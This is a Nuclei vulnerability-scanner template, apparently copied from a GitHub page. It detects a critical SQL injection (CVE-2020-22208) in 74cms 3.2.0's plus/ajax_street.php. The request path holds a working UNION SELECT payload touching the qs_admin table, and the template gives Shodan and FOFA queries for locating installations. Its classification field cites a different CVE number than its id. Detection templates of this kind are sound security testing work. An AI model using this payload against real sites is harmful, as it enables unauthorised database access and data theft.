nuclei-templates/cves/2020/CVE-2020-22208.yaml

37 lines
941 B
YAML
Raw Blame History

id: CVE-2020-22208
info:
name: 74cms - ajax_street.php 'x' SQL Injection
author: ritikchaddha
severity: critical
description: |
SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php.
reference:
- https://github.com/blindkey/cve_like/issues/10
- https://nvd.nist.gov/vuln/detail/CVE-2020-22208
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-22210
cwe-id: CWE-89
metadata:
fofa-query: app="74cms"
shodan-query: http.html:"74cms"
tags: cve,cve2020,74cms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- '{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11<31>%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#'
matchers:
- type: word
part: body
words:
- '{{md5({{num}})}}'
# Enhanced by cs on 2022/06/21